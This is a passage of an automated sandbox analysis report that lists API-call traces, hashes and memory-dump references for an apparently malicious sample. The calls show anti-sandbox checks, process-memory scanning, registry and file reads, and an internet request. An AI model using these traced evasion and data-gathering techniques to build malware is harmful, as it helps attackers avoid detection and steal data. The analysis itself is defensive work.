                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID:
                                      • API String ID: 224852652-0
                                      • Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                      • Instruction ID: a11190d0f193028dcf9cbfbddc07a73a538cbd3642d30c7d6862c0d235025ebf
                                      • Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                      • Instruction Fuzzy Hash: 6E5151B0D01218DBDB14EFA8DC84BEDB7B4AF04309F504AA9D115E7181EBB47A84CF59
                                      APIs
                                      • memset.MSVCRT ref: 00414325
                                      • RegOpenKeyExA.ADVAPI32(80000001,02EB5D10,00000000,00020119,?), ref: 00414344
                                      • RegQueryValueExA.ADVAPI32(?,02EB58B8,00000000,00000000,00000000,000000FF), ref: 00414368
                                      • RegCloseKey.ADVAPI32(?), ref: 00414372
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                      • lstrcatA.KERNEL32(?,02EB58E8), ref: 004143AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                      • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                      • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                      • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                      APIs
                                      • memset.MSVCRT ref: 048D458C
                                      • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 048D45AB
                                      • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 048D45CF
                                      • RegCloseKey.ADVAPI32(?), ref: 048D45D9
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D45FE
                                      • lstrcat.KERNEL32(?,006D6B68), ref: 048D4612
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                      • Instruction ID: 8774c7fd0d9d653cd2a740efd81e8574490e7f0433c2f0586f80ed3da085039f
                                      • Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                      • Instruction Fuzzy Hash: B0416872D111086BDB14EBE4DC85FEE7339AB48700F044A5DB61597184EBB5B7888BE2
                                      APIs
                                      • strtok_s.MSVCRT ref: 004137D8
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • strtok_s.MSVCRT ref: 00413921
                                        • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
                                        • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpystrtok_s$lstrlen
                                      • String ID:
                                      • API String ID: 3184129880-0
                                      • Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                      • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                      • Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                      • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                      APIs
                                      • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 048C9CD1
                                      • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 048C9D12
                                      • InternetCloseHandle.WININET(00000000), ref: 048C9D2E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID:
                                      • API String ID: 3289985339-0
                                      • Opcode ID: bca365d301c4be2b616a8be254450e4ba1b9890f5e8d3d3b41a1ac88c57e5a7f
                                      • Instruction ID: 2165432738bb02f4224ae8c790bad72607bb8b5660a983908ffeedbd63efd7e7
                                      • Opcode Fuzzy Hash: bca365d301c4be2b616a8be254450e4ba1b9890f5e8d3d3b41a1ac88c57e5a7f
                                      • Instruction Fuzzy Hash: D3416A71A01268EBDB14EF98CC84FDDB3B5AB08748F504699F549F6190DBB4BE80CB25
                                      APIs
                                      • __lock.LIBCMT ref: 0041B69A
                                        • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                        • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                        • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B2E6
                                      • DecodePointer.KERNEL32(0042A258,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                      • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B6E7
                                        • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                      • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B70D
                                      • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B720
                                      • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B72A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
                                      • Instruction ID: 83cc19c0f9a08cc6c8264b8aa057ea451e2e215f117fa7a6923d46f1cea91310
                                      • Opcode Fuzzy Hash: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
                                      • Instruction Fuzzy Hash: D131F974900349DFDF11AFA9D9856DDBAF1FF88314F14402BE460A62A0DBB84985CF99
                                      APIs
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 048D9E58
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 048D9E71
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 048D9E89
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 048D9EA1
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 048D9EBA
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 048D9ED2
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 048D9EEA
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 048D9F03
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 048D9F1B
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 048D9F33
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 048D9F4C
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 048D9F64
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 048D9F7C
                                        • Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 048D9F95
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048C1437: ExitProcess.KERNEL32 ref: 048C1478
                                        • Part of subcall function 048C13C7: GetSystemInfo.KERNEL32(?), ref: 048C13D1
                                        • Part of subcall function 048C13C7: ExitProcess.KERNEL32 ref: 048C13E5
                                        • Part of subcall function 048C1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 048C1392
                                        • Part of subcall function 048C1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 048C1399
                                        • Part of subcall function 048C1377: ExitProcess.KERNEL32 ref: 048C13AA
                                        • Part of subcall function 048C1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048C14A5
                                        • Part of subcall function 048C1487: __aulldiv.LIBCMT ref: 048C14BF
                                        • Part of subcall function 048C1487: __aulldiv.LIBCMT ref: 048C14CD
                                        • Part of subcall function 048C1487: ExitProcess.KERNEL32 ref: 048C14FB
                                        • Part of subcall function 048D6C77: GetUserDefaultLangID.KERNEL32 ref: 048D6C7B
                                        • Part of subcall function 048C13F7: ExitProcess.KERNEL32 ref: 048C142D
                                        • Part of subcall function 048D7C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,048C141E), ref: 048D7C77
                                        • Part of subcall function 048D7C47: RtlAllocateHeap.NTDLL(00000000), ref: 048D7C7E
                                        • Part of subcall function 048D7C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 048D7C96
                                        • Part of subcall function 048D7CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7D07
                                        • Part of subcall function 048D7CD7: RtlAllocateHeap.NTDLL(00000000), ref: 048D7D0E
                                        • Part of subcall function 048D7CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 048D7D26
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D6FD1
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 048D6FEF
                                      • CloseHandle.KERNEL32(00000000), ref: 048D7000
                                      • Sleep.KERNEL32(00001770), ref: 048D700B
                                      • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D7021
                                      • ExitProcess.KERNEL32 ref: 048D7029
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                      • Instruction ID: 202e6d728f24efebbd4d3ab1e8c74bc65548c81260a7eff50bfa5358f1b83f52
                                      • Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                      • Instruction Fuzzy Hash: 45315071E42218AAEB08FBF8EC54AFD7375AF14208F500F59A552E2090EFF47904CA63
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                      • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                      • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                      • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                      • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
                                      • ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
                                      • LocalFree.KERNEL32(048C16F6), ref: 048CA447
                                      • CloseHandle.KERNEL32(000000FF), ref: 048CA451
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                      • Instruction ID: 62b7550b063f2c386244db1876a0b4b559b67f782fabbd266835022ff6d31ff2
                                      • Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                      • Instruction Fuzzy Hash: 3F310AB4A0120DEFDB14CFA4D889BAE77B5BF48700F108659E911A7290D774AA81CFA1
                                      APIs
                                      • __getptd.LIBCMT ref: 0041CD1A
                                        • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                        • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                      • __amsg_exit.LIBCMT ref: 0041CD3A
                                      • __lock.LIBCMT ref: 0041CD4A
                                      • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                      • free.MSVCRT ref: 0041CD7A
                                      • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
                                      • Instruction ID: 9bccb4d37e88352bd342e74b92a79a764fb3ddc235490c160eda478cd1c3264c
                                      • Opcode Fuzzy Hash: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
                                      • Instruction Fuzzy Hash: C8018835A816219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                      APIs
                                      • __getptd.LIBCMT ref: 048DCF81
                                        • Part of subcall function 048DC507: __getptd_noexit.LIBCMT ref: 048DC50A
                                        • Part of subcall function 048DC507: __amsg_exit.LIBCMT ref: 048DC517
                                      • __amsg_exit.LIBCMT ref: 048DCFA1
                                      • __lock.LIBCMT ref: 048DCFB1
                                      • InterlockedDecrement.KERNEL32(?), ref: 048DCFCE
                                      • free.MSVCRT ref: 048DCFE1
                                      • InterlockedIncrement.KERNEL32(0042C980), ref: 048DCFF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: a406f9b520e450cd513daa8d859430686771864cb966364ac70015d3cab56a31
                                      • Instruction ID: f1506299e7a2210f60715f940db5d011d333e95f1b0dcd36ea789d518f29380b
                                      • Opcode Fuzzy Hash: a406f9b520e450cd513daa8d859430686771864cb966364ac70015d3cab56a31
                                      • Instruction Fuzzy Hash: E701C031A03A21ABDB24AF699444B9DB7A0BF04718F010B16EC45E7280CBB4B981DFD6
                                      APIs
                                      • strlen.MSVCRT ref: 0041719F
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                        • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                        • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                      • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                        • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                      • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                      • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                      • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                      APIs
                                      • strlen.MSVCRT ref: 048D7406
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,048D7681,00000000,00420BB0,00000000,00000000), ref: 048D7434
                                        • Part of subcall function 048D70B7: strlen.MSVCRT ref: 048D70C8
                                        • Part of subcall function 048D70B7: strlen.MSVCRT ref: 048D70EC
                                      • VirtualQueryEx.KERNEL32(048D77F4,00000000,?,0000001C), ref: 048D7479
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,048D7681), ref: 048D759A
                                        • Part of subcall function 048D72C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 048D72DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                      • Instruction ID: 521f3464e3ffa35ea5f6aa06e631ac3f29adb46e3ed09bb7d2c47f5e4942c3d7
                                      • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                      • Instruction Fuzzy Hash: 6451E6B1A01109EFDB04CF99D981AEFB7B6BF88304F108619F919A7240D735EA11CBA1
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: zn@$zn@
                                      • API String ID: 1029625771-1156428846
                                      • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                      • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
